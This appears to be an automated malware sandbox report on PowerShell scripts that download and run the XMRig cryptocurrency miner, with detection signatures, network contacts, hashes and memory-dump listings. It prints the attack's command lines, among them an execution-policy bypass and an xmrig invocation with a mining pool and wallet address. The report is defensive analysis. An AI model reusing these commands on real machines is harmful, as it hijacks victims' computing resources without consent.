| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3616 wrote to memory of 4176 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/3616-0-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/3616-5-0x000001E9E4110000-0x000001E9E4132000-memory.dmp
memory/3616-7-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-9-0x000001E9FC7C0000-0x000001E9FC836000-memory.dmp
memory/3616-10-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o1m4llql.m5i.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3616-25-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/3616-48-0x000001E9FC780000-0x000001E9FC792000-memory.dmp
memory/3616-61-0x000001E9FC510000-0x000001E9FC51A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4176-90-0x0000014D58920000-0x0000014D58940000-memory.dmp
memory/4176-91-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/3616-93-0x00007FFE06F23000-0x00007FFE06F24000-memory.dmp
memory/4176-92-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/3616-94-0x00007FFE06F20000-0x00007FFE0790C000-memory.dmp
memory/4176-95-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-96-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-97-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-98-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-99-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-100-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-101-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-102-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-103-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-104-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-105-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-106-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-107-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-108-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-109-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-110-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-111-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-112-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-113-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-114-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-115-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-116-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-117-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-118-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-119-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-120-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-121-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-122-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-123-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-124-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-125-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-126-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-127-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-128-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-129-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-130-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-131-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-132-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-133-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-134-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-135-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-136-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-137-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-138-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-139-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-140-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-141-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-142-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-143-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-144-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-145-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-146-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-147-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-148-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-149-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-150-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-151-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-152-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-153-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-154-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
memory/4176-155-0x00007FF792CF0000-0x00007FF793923000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/4512-3-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp
memory/4512-6-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-5-0x0000017665780000-0x00000176657A2000-memory.dmp
memory/4512-9-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-10-0x000001767DF30000-0x000001767DFA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv1hpey3.hp1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4512-25-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-48-0x00000176657B0000-0x00000176657C2000-memory.dmp
memory/4512-61-0x0000017665760000-0x000001766576A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/648-90-0x0000018C599A0000-0x0000018C599C0000-memory.dmp
memory/648-91-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/4512-92-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/4512-94-0x00007FF9BAE73000-0x00007FF9BAE74000-memory.dmp
memory/648-93-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/4512-95-0x00007FF9BAE70000-0x00007FF9BB85C000-memory.dmp
memory/648-96-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-97-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-98-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-99-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-100-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-101-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-102-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-103-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-104-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-105-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-106-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-107-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-108-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-109-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-110-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-111-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-112-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-113-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-114-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-115-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-116-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-117-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-118-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-119-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-120-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-121-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-122-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-123-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-124-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-125-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-126-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-127-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-128-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-129-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-130-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-131-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-132-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-133-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-134-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-135-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-136-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-137-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-138-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-139-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-140-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-141-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-142-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-143-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-144-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-145-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-146-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-147-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-148-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-149-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-150-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-151-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-152-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-153-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-154-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-155-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
memory/648-156-0x00007FF78B3A0000-0x00007FF78BFD3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4468 wrote to memory of 1060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4468 wrote to memory of 1060 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.21:443 | tcp |
Files
memory/4468-0-0x00007FFA23E73000-0x00007FFA23E75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2jzigi0y.ggf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4468-9-0x0000020F74340000-0x0000020F74362000-memory.dmp
memory/4468-10-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-11-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-12-0x00007FFA23E70000-0x00007FFA24932000-memory.dmp
memory/4468-14-0x0000020F743D0000-0x0000020F743E2000-memory.dmp
memory/4468-15-0x0000020F743B0000-0x0000020F743BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
